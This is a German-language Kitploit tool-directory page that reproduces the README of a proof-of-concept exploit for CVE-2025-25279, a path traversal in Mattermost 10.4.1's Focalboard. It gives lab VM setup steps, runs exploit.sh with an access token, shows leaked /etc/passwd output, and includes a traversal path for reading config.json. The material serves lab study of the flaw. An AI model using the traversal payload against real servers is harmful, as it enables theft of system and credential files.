Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — Proof-of-Concept-Exploit für CVE-2025-25279, eine Path-Traversal-Sicherheitslücke im Focalboard-Modul von Mattermost 10.4.1, die authentifizierten Benutzern die Exfiltration beliebiger Dateien mittels präparierter Anhänge ermöglicht. | Kitploit
Tools/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

Proof-of-Concept-Exploit für CVE-2025-25279, eine Path-Traversal-Sicherheitslücke im Focalboard-Modul von Mattermost 10.4.1, die authentifizierten Benutzern die Exfiltration beliebiger Dateien mittels präparierter Anhänge ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 3 MonatenNoch nicht geprüft

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 Path Traversal in Focalboard ermöglicht Dateiexfiltration

🌟 Einführung

Diese Proof-of-Concept demonstriert die Ausnutzung der Sicherheitslücke CVE-2025-25279, die Mattermost 10.4.1 betrifft.
Ein Fehler in Focalboard (dem Board-Verwaltungsmodul) ermöglicht das willkürliche Lesen von Dateien durch einen Path Traversal in den Anhängen.

Der Exploit ermöglicht die Exfiltration von:

  • /etc/passwd
  • /etc/group
  • oder sensible Mattermost-Dateien, zum Beispiel:
    opt/mattermost/config/config.json

Der Angriff funktioniert nur mit einem authentifizierten Benutzerkonto in den angreifbaren Szenarien.


🗂️ Verzeichnisstruktur

  • 📁 target : Verzeichnis zur Erstellung der Ziel-Box
  • 📁 live : Verzeichnis zur Erstellung von Ziel-VM(s) und Demonstration des Exploits
  • 📁 src : eventueller Hilfsquellcode
  • 📁 refs : Verzeichnis mit Artikeln und Bibliographie
  • 📁 docs : zugehörige Dokumente aus dem Projekt, einschließlich Videoaufzeichnungen

🔧 Voraussetzungen

  • Vagrant
  • VirtualBox
  • Dateisatz des Projekts (target + live)
  • Ein Mattermost-Konto (PAT = Personal Access Token)
  • Linux/Mac/Windows mit Bash

📦 Herunterladen von Mattermost

Der Ordner target/ ist nicht enthalten (zu groß für GitHub).

Manuell herunterladen: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

Dann die Datei in target ablegen


Vor dem Bereitstellen der VM

Gehen Sie zunächst in das Verzeichnis target und führen Sie aus:

root@kitploit:~
cd target
make mattermost.box

Stellen Sie sicher, dass Sie die Box mattermost-poc haben, sonst funktioniert die VM nicht:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. Bereitstellung der anfälligen Maschine

VM starten

root@kitploit:~
cd live/vm1
vagrant up

Mit der VM verbinden

root@kitploit:~
 vagrant ssh

einen Benutzer in der Weboberfläche erstellen:

Öffnen: http://localhost:8065

einen Token in der UI (Benutzeroberfläche) erstellen:

Profil --> Sicherheit --> Personal Access Tokens

2. Installation des Exploits

Vom Host-Rechner aus:

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. Exploit ausführen

root@kitploit:~
./exploit.sh

Sie werden aufgefordert:

root@kitploit:~
PAT (Personal Access Token) :

👉 Geben Sie ein gültiges PAT eines Mattermost-Benutzers ein.

📸 Beispielausgabe (Exfiltration von /etc/passwd)

root@kitploit:~
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

Ziel-Datei: config.json

Um eine sensible Mattermost-Datei anzuzielen:

Ändern Sie oben im Skript exploit.sh:

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
L’exploit affichera alors le contenu du fichier config.json.

✒️ Autoren

🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril

🎬 Video-Demonstration

👉 Eine vollständige Videodemonstration befindet sich in: live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 Anmerkungen

Dieses PoC ist ausschließlich für Lernumgebungen bestimmt. Niemals außerhalb des Bildungsrahmens oder ohne Genehmigung verwenden.

Tool herunterladen